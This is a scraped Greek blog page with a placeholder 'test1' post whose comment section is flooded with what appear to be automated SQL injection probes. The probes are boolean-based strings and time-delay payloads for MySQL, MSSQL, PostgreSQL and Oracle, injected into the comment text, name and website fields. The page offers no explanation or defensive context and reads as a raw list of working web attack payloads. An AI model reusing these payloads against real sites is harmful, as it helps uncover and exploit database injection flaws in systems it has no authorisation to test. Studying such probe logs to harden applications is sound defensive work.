Τελευταία νέα
test1
test1
01/07/2016 93

test
test
29/06/2016 1

blog
blog
06/09/2015 100

test1

Posted by superadmin 01/07/2016 93 Comment(s)

93 Comment(s)

wUmrLVWz:
10/08/2020, 12:45:54 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:46:03 PM

1

wUmrLVWz:
10/08/2020, 12:49:34 PM

1

wUmrLVWz:
10/08/2020, 12:49:36 PM

1

wUmrLVWz:
10/08/2020, 12:50:17 PM

1

wUmrLVWz:
10/08/2020, 12:50:19 PM

1

wUmrLVWz:
10/08/2020, 12:50:21 PM

1

wUmrLVWz:
10/08/2020, 12:50:23 PM

1

wUmrLVWz:
10/08/2020, 12:50:57 PM

1

wUmrLVWz:
10/08/2020, 12:51:02 PM

1

wUmrLVWz:
10/08/2020, 12:51:03 PM

-1 OR 2+768-768-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:51:05 PM

-1 OR 3+768-768-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:51:06 PM

-1 OR 2+301-301-1=0+0+0+1

wUmrLVWz:
10/08/2020, 12:51:06 PM

-1 OR 3+301-301-1=0+0+0+1

wUmrLVWz:
10/08/2020, 12:51:07 PM

-1' OR 2+243-243-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:51:10 PM

-1' OR 3+243-243-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:51:11 PM

-1' OR 2+766-766-1=0+0+0+1 or 'IDT222MP'='

wUmrLVWz:
10/08/2020, 12:51:12 PM

-1' OR 3+766-766-1=0+0+0+1 or 'IDT222MP'='

wUmrLVWz:
10/08/2020, 12:51:13 PM

-1" OR 2+122-122-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:51:14 PM

-1" OR 3+122-122-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:51:16 PM

if(now()=sysdate(),sleep(15),0)

wUmrLVWz:
10/08/2020, 12:51:17 PM

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

wUmrLVWz:
10/08/2020, 12:51:19 PM

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

wUmrLVWz:
10/08/2020, 12:51:21 PM

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

wUmrLVWz:
10/08/2020, 12:51:23 PM

-1; waitfor delay '0:0:15' --

wUmrLVWz:
10/08/2020, 12:51:24 PM

-1); waitfor delay '0:0:15' --

wUmrLVWz:
10/08/2020, 12:51:25 PM

1 waitfor delay '0:0:15' --

wUmrLVWz:
10/08/2020, 12:51:26 PM

JguezK5w'; waitfor delay '0:0:15' --

wUmrLVWz:
10/08/2020, 12:51:27 PM

-5 OR 788=(SELECT 788 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:51:28 PM

-5) OR 706=(SELECT 706 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:51:29 PM

-1)) OR 900=(SELECT 900 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:51:32 PM

gvXIjoVP' OR 531=(SELECT 531 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:51:33 PM

JTURTrmW') OR 266=(SELECT 266 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:51:34 PM

af3IFGuG')) OR 585=(SELECT 585 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:51:36 PM

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

wUmrLVWz:
10/08/2020, 12:51:37 PM

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

wUmrLVWz:
10/08/2020, 12:51:38 PM

1'"

wUmrLVWz:
10/08/2020, 12:51:40 PM

@@RJsN3

wUmrLVWz:
10/08/2020, 12:51:40 PM

1

wUmrLVWz:
10/08/2020, 12:51:41 PM

1

wUmrLVWz:
10/08/2020, 12:52:09 PM

1

wUmrLVWz:
10/08/2020, 12:52:10 PM

1

-1 OR 2+373-373-1=0+0+0+1 --:
10/08/2020, 12:52:11 PM

1

-1 OR 3+373-373-1=0+0+0+1 --:
10/08/2020, 12:52:11 PM

1

-1 OR 2+691-691-1=0+0+0+1:
10/08/2020, 12:52:12 PM

1

-1 OR 3+691-691-1=0+0+0+1:
10/08/2020, 12:52:12 PM

1

-1' OR 2+481-481-1=0+0+0+1 --:
10/08/2020, 12:52:13 PM

1

-1' OR 3+481-481-1=0+0+0+1 --:
10/08/2020, 12:52:13 PM

1

-1' OR 2+800-800-1=0+0+0+1 or 'IBis3zBD'=':
10/08/2020, 12:52:15 PM

1

-1' OR 3+800-800-1=0+0+0+1 or 'IBis3zBD'=':
10/08/2020, 12:52:16 PM

1

-1" OR 2+683-683-1=0+0+0+1 --:
10/08/2020, 12:52:16 PM

1

-1" OR 3+683-683-1=0+0+0+1 --:
10/08/2020, 12:52:17 PM

1

if(now()=sysdate(),sleep(15),0):
10/08/2020, 12:52:19 PM

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z:
10/08/2020, 12:52:20 PM

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z:
10/08/2020, 12:52:21 PM

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/:
10/08/2020, 12:52:22 PM

1

1 waitfor delay '0:0:15' --:
10/08/2020, 12:52:22 PM

1

XBmqVzLR'; waitfor delay '0:0:15' --:
10/08/2020, 12:52:23 PM

1

CURHvesu' OR 92=(SELECT 92 FROM PG_SLEEP(15))--:
10/08/2020, 12:52:24 PM

1

PZbdtztw') OR 324=(SELECT 324 FROM PG_SLEEP(15))--:
10/08/2020, 12:52:25 PM

1

0Fgtw2Hp')) OR 55=(SELECT 55 FROM PG_SLEEP(15))--:
10/08/2020, 12:52:27 PM

1

wUmrLVWz'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||':
10/08/2020, 12:52:28 PM

1

1'":
10/08/2020, 12:52:28 PM

1

@@Imw2e:
10/08/2020, 12:52:30 PM

1

wUmrLVWz:
10/08/2020, 12:52:31 PM

1

wUmrLVWz:
10/08/2020, 12:52:32 PM

1

wUmrLVWz:
10/08/2020, 12:52:45 PM

1

wUmrLVWz:
10/08/2020, 12:52:46 PM

1

wUmrLVWz:
10/08/2020, 12:52:49 PM

1

wUmrLVWz:
10/08/2020, 12:52:50 PM

1

wUmrLVWz:
10/08/2020, 12:52:51 PM

1

wUmrLVWz:
10/08/2020, 12:52:51 PM

1

wUmrLVWz:
10/08/2020, 12:52:52 PM

1

wUmrLVWz:
10/08/2020, 12:52:53 PM

1

wUmrLVWz:
10/08/2020, 12:52:54 PM

1

wUmrLVWz:
10/08/2020, 12:52:56 PM

1

wUmrLVWz:
10/08/2020, 12:52:57 PM

1

wUmrLVWz:
10/08/2020, 12:52:57 PM

1

wUmrLVWz:
10/08/2020, 12:52:58 PM

1

wUmrLVWz:
10/08/2020, 12:52:59 PM

1

wUmrLVWz:
10/08/2020, 12:53:00 PM

1

wUmrLVWz:
10/08/2020, 12:53:02 PM

1

wUmrLVWz:
10/08/2020, 12:53:03 PM

1

wUmrLVWz:
10/08/2020, 12:53:06 PM

1

wUmrLVWz:
10/08/2020, 12:53:07 PM

1

wUmrLVWz:
10/08/2020, 12:53:10 PM

1

wUmrLVWz:
10/08/2020, 12:53:13 PM

1

wUmrLVWz:
10/08/2020, 12:53:15 PM

1

wUmrLVWz:
10/08/2020, 12:53:17 PM

1

wUmrLVWz:
10/08/2020, 12:53:19 PM

1

wUmrLVWz:
10/08/2020, 12:53:19 PM

1

wUmrLVWz:
10/08/2020, 12:53:20 PM

1

wUmrLVWz:
10/08/2020, 12:53:21 PM

1

wUmrLVWz:
10/08/2020, 12:49:33 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:49:35 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:50:13 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:50:17 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:50:18 PM, www.vulnweb.com
Reply

-1 OR 2+977-977-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:50:19 PM, www.vulnweb.com
Reply

-1 OR 3+977-977-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:50:20 PM, www.vulnweb.com
Reply

-1 OR 2+967-967-1=0+0+0+1

wUmrLVWz:
10/08/2020, 12:50:21 PM, www.vulnweb.com
Reply

-1 OR 3+967-967-1=0+0+0+1

wUmrLVWz:
10/08/2020, 12:50:23 PM, www.vulnweb.com
Reply

-1' OR 2+171-171-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:50:23 PM, www.vulnweb.com
Reply

-1' OR 3+171-171-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:50:24 PM, www.vulnweb.com
Reply

-1' OR 2+726-726-1=0+0+0+1 or 'PyyMHKjT'='

wUmrLVWz:
10/08/2020, 12:50:25 PM, www.vulnweb.com
Reply

-1' OR 3+726-726-1=0+0+0+1 or 'PyyMHKjT'='

wUmrLVWz:
10/08/2020, 12:50:26 PM, www.vulnweb.com
Reply

-1" OR 2+76-76-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:50:26 PM, www.vulnweb.com
Reply

-1" OR 3+76-76-1=0+0+0+1 --

wUmrLVWz:
10/08/2020, 12:50:27 PM, www.vulnweb.com
Reply

if(now()=sysdate(),sleep(15),0)

wUmrLVWz:
10/08/2020, 12:50:29 PM, www.vulnweb.com
Reply

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

wUmrLVWz:
10/08/2020, 12:50:30 PM, www.vulnweb.com
Reply

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

wUmrLVWz:
10/08/2020, 12:50:32 PM, www.vulnweb.com
Reply

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

wUmrLVWz:
10/08/2020, 12:50:33 PM, www.vulnweb.com
Reply

-1; waitfor delay '0:0:15' --

wUmrLVWz:
10/08/2020, 12:50:35 PM, www.vulnweb.com
Reply

-1); waitfor delay '0:0:15' --

wUmrLVWz:
10/08/2020, 12:50:37 PM, www.vulnweb.com
Reply

1 waitfor delay '0:0:15' --

wUmrLVWz:
10/08/2020, 12:50:39 PM, www.vulnweb.com
Reply

fTPslXhU'; waitfor delay '0:0:15' --

wUmrLVWz:
10/08/2020, 12:50:41 PM, www.vulnweb.com
Reply

-5 OR 872=(SELECT 872 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:50:42 PM, www.vulnweb.com
Reply

-5) OR 110=(SELECT 110 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:50:43 PM, www.vulnweb.com
Reply

-1)) OR 166=(SELECT 166 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:50:45 PM, www.vulnweb.com
Reply

o4SB9dDi' OR 788=(SELECT 788 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:50:47 PM, www.vulnweb.com
Reply

FBJb5sCR') OR 193=(SELECT 193 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:50:48 PM, www.vulnweb.com
Reply

agpHqU3N')) OR 614=(SELECT 614 FROM PG_SLEEP(15))--

wUmrLVWz:
10/08/2020, 12:50:49 PM, www.vulnweb.com
Reply

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

wUmrLVWz:
10/08/2020, 12:50:50 PM, www.vulnweb.com
Reply

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

wUmrLVWz:
10/08/2020, 12:50:50 PM, www.vulnweb.com
Reply

1'"

wUmrLVWz:
10/08/2020, 12:50:51 PM, www.vulnweb.com
Reply

@@VCxwj

wUmrLVWz:
10/08/2020, 12:50:52 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:50:53 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:51:07 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:51:08 PM, www.vulnweb.com
Reply

1

-1 OR 2+112-112-1=0+0+0+1 --:
10/08/2020, 12:51:08 PM, www.vulnweb.com
Reply

1

-1 OR 3+112-112-1=0+0+0+1 --:
10/08/2020, 12:51:08 PM, www.vulnweb.com
Reply

1

-1 OR 2+329-329-1=0+0+0+1:
10/08/2020, 12:51:09 PM, www.vulnweb.com
Reply

1

-1 OR 3+329-329-1=0+0+0+1:
10/08/2020, 12:51:10 PM, www.vulnweb.com
Reply

1

-1' OR 2+951-951-1=0+0+0+1 --:
10/08/2020, 12:51:11 PM, www.vulnweb.com
Reply

1

-1' OR 3+951-951-1=0+0+0+1 --:
10/08/2020, 12:51:11 PM, www.vulnweb.com
Reply

1

-1' OR 2+384-384-1=0+0+0+1 or 'WV5badA7'=':
10/08/2020, 12:51:12 PM, www.vulnweb.com
Reply

1

-1' OR 3+384-384-1=0+0+0+1 or 'WV5badA7'=':
10/08/2020, 12:51:13 PM, www.vulnweb.com
Reply

1

-1" OR 2+718-718-1=0+0+0+1 --:
10/08/2020, 12:51:13 PM, www.vulnweb.com
Reply

1

-1" OR 3+718-718-1=0+0+0+1 --:
10/08/2020, 12:51:14 PM, www.vulnweb.com
Reply

1

if(now()=sysdate(),sleep(15),0):
10/08/2020, 12:51:15 PM, www.vulnweb.com
Reply

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z:
10/08/2020, 12:51:16 PM, www.vulnweb.com
Reply

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z:
10/08/2020, 12:51:17 PM, www.vulnweb.com
Reply

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/:
10/08/2020, 12:51:18 PM, www.vulnweb.com
Reply

1

1 waitfor delay '0:0:15' --:
10/08/2020, 12:51:18 PM, www.vulnweb.com
Reply

1

SAYtYbCo'; waitfor delay '0:0:15' --:
10/08/2020, 12:51:19 PM, www.vulnweb.com
Reply

1

dMH3idxl' OR 703=(SELECT 703 FROM PG_SLEEP(15))--:
10/08/2020, 12:51:20 PM, www.vulnweb.com
Reply

1

PiPpMVf5') OR 118=(SELECT 118 FROM PG_SLEEP(15))--:
10/08/2020, 12:51:21 PM, www.vulnweb.com
Reply

1

eMerirun')) OR 38=(SELECT 38 FROM PG_SLEEP(15))--:
10/08/2020, 12:51:22 PM, www.vulnweb.com
Reply

1

wUmrLVWz'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||':
10/08/2020, 12:51:22 PM, www.vulnweb.com
Reply

1

1'":
10/08/2020, 12:51:23 PM, www.vulnweb.com
Reply

1

@@epgew:
10/08/2020, 12:51:23 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:51:24 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:51:25 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:51:26 PM, -1 OR 2+805-805-1=0+0+0+1 --
Reply

1

wUmrLVWz:
10/08/2020, 12:51:26 PM, -1 OR 3+805-805-1=0+0+0+1 --
Reply

1

wUmrLVWz:
10/08/2020, 12:51:26 PM, -1 OR 2+180-180-1=0+0+0+1
Reply

1

wUmrLVWz:
10/08/2020, 12:51:27 PM, -1 OR 3+180-180-1=0+0+0+1
Reply

1

wUmrLVWz:
10/08/2020, 12:51:28 PM, -1' OR 2+424-424-1=0+0+0+1 --
Reply

1

wUmrLVWz:
10/08/2020, 12:51:29 PM, -1' OR 3+424-424-1=0+0+0+1 --
Reply

1

wUmrLVWz:
Reply

1

wUmrLVWz:
Reply

1

wUmrLVWz:
10/08/2020, 12:51:30 PM, -1" OR 2+99-99-1=0+0+0+1 --
Reply

1

wUmrLVWz:
10/08/2020, 12:51:31 PM, -1" OR 3+99-99-1=0+0+0+1 --
Reply

1

wUmrLVWz:
10/08/2020, 12:51:31 PM, if(now()=sysdate(),sleep(15),0)
Reply

1

wUmrLVWz:
Reply

1

wUmrLVWz:
Reply

1

wUmrLVWz:
10/08/2020, 12:51:35 PM, 1 waitfor delay '0:0:15' --
Reply

1

wUmrLVWz:
10/08/2020, 12:51:35 PM, mlozZN6X'; waitfor delay '0:0:15' --
Reply

1

wUmrLVWz:
Reply

1

wUmrLVWz:
Reply

1

wUmrLVWz:
Reply

1

wUmrLVWz:
10/08/2020, 12:51:39 PM, 1'"
Reply

1

wUmrLVWz:
10/08/2020, 12:51:39 PM
Reply

1

wUmrLVWz:
10/08/2020, 12:51:40 PM, @@PPqiE
Reply

1

wUmrLVWz:
10/08/2020, 12:52:35 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:52:36 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:52:36 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:52:37 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:52:41 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:52:43 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:52:44 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:52:48 PM, www.vulnweb.com
Reply

1

wUmrLVWz:
10/08/2020, 12:52:48 PM, www.vulnweb.com
Reply

1

Αφήστε μας ένα σχόλιο